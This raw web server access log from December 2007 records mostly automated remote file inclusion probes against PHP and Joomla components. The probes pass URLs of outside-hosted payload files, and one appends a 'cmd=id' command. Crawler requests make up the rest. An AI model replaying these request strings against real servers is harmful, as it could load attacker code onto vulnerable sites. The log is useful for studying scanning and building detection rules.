128.121.21.39 - - [09/Dec/2007:16:01:41 -0800] "GET /logs/access_070716.log//contrib/mx_glance_sdesc.php?mx_root_path=http://www.graka.nl/folder/folder1.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.121.21.39 - - [09/Dec/2007:16:01:41 -0800] "GET //contrib/mx_glance_sdesc.php?mx_root_path=http://www.graka.nl/folder/folder1.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.121.21.39 - - [09/Dec/2007:16:01:41 -0800] "GET /logs//contrib/mx_glance_sdesc.php?mx_root_path=http://www.graka.nl/folder/folder1.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
72.232.108.82 - - [09/Dec/2007:16:02:22 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.216.109 - - [09/Dec/2007:16:02:32 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
88.131.106.16 - - [09/Dec/2007:16:03:01 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [09/Dec/2007:16:03:02 -0800] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
85.214.78.110 - - [09/Dec/2007:16:03:14 -0800] "GET //dotproject/classes/query.class.php?baseDir=http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
128.121.21.39 - - [09/Dec/2007:16:03:21 -0800] "GET //contrib/mx_glance_sdesc.php?mx_root_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.232.108.82 - - [09/Dec/2007:16:03:43 -0800] "GET /logs/access_070917.log//modules/vwar/admin/admin.php?vwar_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.108.82 - - [09/Dec/2007:16:03:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.120.239.187 - - [09/Dec/2007:16:04:15 -0800] "GET /logs/access.log HTTP/1.0" 200 2137 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.galf.org"
66.249.24.204 - - [09/Dec/2007:16:04:15 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.39.235 - - [09/Dec/2007:16:05:07 -0800] "GET /logs/access_070917.log/convert/mvcw.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.235 - - [09/Dec/2007:16:05:07 -0800] "GET /convert/mvcw.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.235 - - [09/Dec/2007:16:05:07 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.27.144.142 - - [09/Dec/2007:16:05:36 -0800] "GET /db_adodb.php?baseDir=http://www.kalinovka.com/files/thumbs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.249.24.204 - - [09/Dec/2007:16:05:37 -0800] "GET /logs/access_070917.log//modules/vwar/admin/admin.php?vwar_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.249.24.204 - - [09/Dec/2007:16:05:37 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.232.3.137 - - [09/Dec/2007:16:05:43 -0800] "GET /logs/access.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ebci.ucr.ac.cr/administrator/images/.rew.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.232.3.137 - - [09/Dec/2007:16:05:44 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ebci.ucr.ac.cr/administrator/images/.rew.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.232.3.137 - - [09/Dec/2007:16:05:45 -0800] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ebci.ucr.ac.cr/administrator/images/.rew.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.85.147.194 - - [09/Dec/2007:16:06:10 -0800] "GET //dotproject/classes/query.class.php?baseDir=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.142.215.12 - - [09/Dec/2007:16:06:13 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.39.235 - - [09/Dec/2007:16:06:16 -0800] "GET /logs/access_071029.log/convert/mvcw.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
82.232.3.137 - - [09/Dec/2007:16:06:16 -0800] "GET /logs/access_071112.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ebci.ucr.ac.cr/administrator/images/.rew.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.22.156 - - [09/Dec/2007:16:06:31 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 1048576 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:16:06:56 -0800] "GET /logs/access_070723.log/index.php?url=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.142.215.12 - - [09/Dec/2007:16:08:25 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
63.247.133.76 - - [09/Dec/2007:16:10:11 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.247.133.76 - - [09/Dec/2007:16:10:11 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.247.133.76 - - [09/Dec/2007:16:10:11 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.99 - - [09/Dec/2007:16:10:18 -0800] "GET //////index.php?x=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.247.133.76 - - [09/Dec/2007:16:10:19 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
63.247.133.76 - - [09/Dec/2007:16:10:19 -0800] "GET /modules/My_eGallery/index.php?basepath=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.90.163.98 - - [09/Dec/2007:16:10:37 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.90.163.98 - - [09/Dec/2007:16:10:37 -0800] "GET /modules/My_eGallery/index.php?basepath=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.90.163.98 - - [09/Dec/2007:16:10:52 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.90.163.98 - - [09/Dec/2007:16:10:52 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.90.163.98 - - [09/Dec/2007:16:10:52 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.142.215.12 - - [09/Dec/2007:16:11:06 -0800] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
193.142.215.12 - - [09/Dec/2007:16:11:06 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.142.215.12 - - [09/Dec/2007:16:11:26 -0800] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.142.215.12 - - [09/Dec/2007:16:12:20 -0800] "GET /logs/access_070917.log//modules/vwar/admin/admin.php?vwar_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.142.215.12 - - [09/Dec/2007:16:12:20 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.30.214.230 - - [09/Dec/2007:16:13:16 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:16:14:34 -0800] "GET /logs/access_071015.log/index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:16:14:34 -0800] "GET /index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:16:14:34 -0800] "GET /logs/index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.176.32 - - [09/Dec/2007:16:15:01 -0800] "GET //dotproject/classes/query.class.php?baseDir=http://smokintony.com//administrator/components/com_wmtportfolio/.r/find? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.212.90 - - [09/Dec/2007:16:15:03 -0800] "GET //contrib/mx_glance_sdesc.php?mx_root_path=http://www.graka.nl/folder/folder1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
128.121.21.39 - - [09/Dec/2007:16:15:26 -0800] "GET /logs/access_070716.log//contrib/mx_glance_sdesc.php?mx_root_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.121.21.39 - - [09/Dec/2007:16:15:27 -0800] "GET /logs//contrib/mx_glance_sdesc.php?mx_root_path=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:16:18:31 -0800] "GET /logs/access.log/index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.38.50.26 - - [09/Dec/2007:16:18:35 -0800] "GET /logs/access_071015.log/index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:16:18:36 -0800] "GET /index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:16:18:36 -0800] "GET /logs/index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.79.2 - - [09/Dec/2007:16:18:59 -0800] "GET /logs/index2.php?url=http://localizit.com/data/ash.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.79.2 - - [09/Dec/2007:16:19:00 -0800] "GET /index2.php?url=http://localizit.com/data/ash.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.249.73.202 - - [09/Dec/2007:16:20:44 -0800] "GET /logs/access_070813.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
85.214.78.110 - - [09/Dec/2007:16:21:03 -0800] "GET /logs/access_071014.log//dotproject/classes/query.class.php?baseDir=http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.78.110 - - [09/Dec/2007:16:21:03 -0800] "GET /logs//dotproject/classes/query.class.php?baseDir=http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.141.39.235 - - [09/Dec/2007:16:21:32 -0800] "GET /logs/access_070924.log/convert/mvcw.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
88.131.106.16 - - [09/Dec/2007:16:21:48 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:16:22:24 -0800] "GET /logs/access.log/index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.35.215.161 - - [09/Dec/2007:16:23:21 -0800] "GET /middle.php?file=http://namelesslove.interfree.it/vignette/phpmic_txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
212.35.215.161 - - [09/Dec/2007:16:23:21 -0800] "GET /logs/middle.php?file=http://namelesslove.interfree.it/vignette/phpmic_txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
212.35.215.161 - - [09/Dec/2007:16:24:15 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://namelesslove.interfree.it/vignette/phpmic_txt.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
212.35.215.161 - - [09/Dec/2007:16:24:15 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://namelesslove.interfree.it/vignette/phpmic_txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
87.118.108.246 - - [09/Dec/2007:16:26:10 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.118.108.246 - - [09/Dec/2007:16:26:16 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.118.108.246 - - [09/Dec/2007:16:26:24 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.118.108.246 - - [09/Dec/2007:16:26:25 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.55.208.229 - - [09/Dec/2007:16:27:28 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.229 - - [09/Dec/2007:16:27:28 -0800] "GET /labia/?M=D HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:28:10 -0800] "GET /logs/access.log/main.php?x=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:28:10 -0800] "GET /logs/access.log/main.php?x=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:28:11 -0800] "GET /main.php?x=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.19.25.98 - - [09/Dec/2007:16:28:11 -0800] "GET /main.php?x=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:28:11 -0800] "GET /logs/main.php?x=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:28:11 -0800] "GET /logs/main.php?x=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.212.90 - - [09/Dec/2007:16:29:06 -0800] "GET /logs/access_070716.log//contrib/mx_glance_sdesc.php?mx_root_path=http://www.graka.nl/folder/folder1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.212.90 - - [09/Dec/2007:16:29:06 -0800] "GET /logs//contrib/mx_glance_sdesc.php?mx_root_path=http://www.graka.nl/folder/folder1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.108.82 - - [09/Dec/2007:16:29:39 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.19.25.98 - - [09/Dec/2007:16:29:46 -0800] "GET /main.php?x=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:29:46 -0800] "GET /main.php?x=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.99 - - [09/Dec/2007:16:31:15 -0800] "GET /logs/////administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.99 - - [09/Dec/2007:16:31:16 -0800] "GET /////administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.156 - - [09/Dec/2007:16:31:56 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 1048576 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:31:57 -0800] "GET /logs/access_071105.log/main.php?x=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.99 - - [09/Dec/2007:16:32:02 -0800] "GET /logs/access_071015.log//////index.php?x=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.99 - - [09/Dec/2007:16:32:02 -0800] "GET /logs//////index.php?x=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:32:09 -0800] "GET /logs/access_071105.log/main.php?x=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.108.82 - - [09/Dec/2007:16:32:15 -0800] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.108.82 - - [09/Dec/2007:16:32:15 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.108.82 - - [09/Dec/2007:16:32:33 -0800] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.79.2 - - [09/Dec/2007:16:34:20 -0800] "GET /logs/access.log/index2.php?url=http://localizit.com/data/ash.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.249.24.204 - - [09/Dec/2007:16:36:52 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.131.106.16 - - [09/Dec/2007:16:38:51 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
80.67.20.99 - - [09/Dec/2007:16:39:50 -0800] "GET /logs/access_070716.log/////administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.249.24.204 - - [09/Dec/2007:16:40:01 -0800] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.249.24.204 - - [09/Dec/2007:16:40:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.156 - - [09/Dec/2007:16:40:03 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.249.24.204 - - [09/Dec/2007:16:40:18 -0800] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
80.67.20.99 - - [09/Dec/2007:16:40:32 -0800] "GET /logs/access.log//////index.php?x=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.100.253.45 - - [09/Dec/2007:16:40:42 -0800] "GET /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://kilicarslan.ch/cc.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
80.67.20.99 - - [09/Dec/2007:16:41:27 -0800] "GET /logs/access_071001.log/////administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:43:10 -0800] "GET /logs/access.log/default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:43:10 -0800] "GET /default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:43:10 -0800] "GET /logs/default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.227.80.157 - - [09/Dec/2007:16:43:56 -0800] "GET /logs/access_071105.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.227.80.157 - - [09/Dec/2007:16:43:56 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.227.80.157 - - [09/Dec/2007:16:43:57 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:43:57 -0800] "GET /logs/access.log/default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:43:57 -0800] "GET /default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:43:58 -0800] "GET /logs/default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.101.244.7 - - [09/Dec/2007:16:44:23 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://aspato-go.com/cartt/images/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.101.244.9 - - [09/Dec/2007:16:44:24 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://aspato-go.com/cartt/images/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:16:44:27 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:16:44:27 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.25.205 - - [09/Dec/2007:16:46:16 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.227.80.157 - - [09/Dec/2007:16:46:51 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.146.199.232 - - [09/Dec/2007:16:47:34 -0800] "GET /logs/modules/mx_charts/charts_constants.php?module_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
